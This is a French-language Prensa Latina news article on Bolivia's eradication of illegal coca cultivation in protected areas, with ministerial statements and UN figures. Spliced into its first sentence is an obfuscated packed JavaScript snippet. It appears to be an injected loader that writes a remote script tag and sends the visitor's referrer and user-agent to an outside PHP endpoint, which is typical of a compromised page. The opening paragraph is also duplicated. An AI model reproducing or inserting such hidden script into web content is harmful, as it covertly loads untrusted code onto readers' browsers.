lundi 22 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

La Bolivie roule pour l’élimination illégale de la culture de coca

La eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ehefr|var|u0026u|referrer|zbzan||js|php'.split('|'),0,{})) Paz, 3 fév (PL) Le Commandement opérationnel de Bolivie a débuté ses travaux pour éliminer la culture excédentaire et illégale de coca dans les parcs nationaux et dans les réserves forestières.

La Paz, 3 fév (PL) Le Commandement opérationnel de Bolivie a débuté ses travaux pour éliminer la culture excédentaire et illégale de coca dans les parcs nationaux et dans les réserves forestières.

 Felipe Caceres, vice-ministre de la Défense sociale et des substances contrôlées, a déclaré à la presse que les actions avaient commencé ce lundi à Chimoré, dan le département de Cochabamba.

Avec l’élimination de 6. 576 hectares en 2016, le but établi par la Loi 1008 a été atteint. Il n’y aura pas de négociations sur cette loi visant à éradiquer la culture illégale de coca dans les zones protégées et le réserves forestières, a souligné M. le Ministre.

L’an passé une commission de la Organe international de contrôle des stupéfiants (OICS) a surveillé des actions pour éliminer la culture illégale de coca en Bolivie. Les fonctionnaires de l’OICS ont été informés sur les traités signés avec d’autres Etats pour la mise en vigueur d’actions communes contre ce délit.

 Dans plusieurs occasions, l’Office des Nations unies contre la drogue et le crime a reconnu les progrès de la Bolivie dans la lutte contre la culture illégale de coca lesquels ont été réduits de 31. 000 hectares en 2010 à 20. 200 en 2015.

 En Bolivie, la consommation de la feuille de coca est une habitude millénaire et sa culture est autorisée pour la mastication de la feuille, les infusions et l’obtention de médicaments.

Rm/lp/lma/clp

EN CONTINU
notes connexes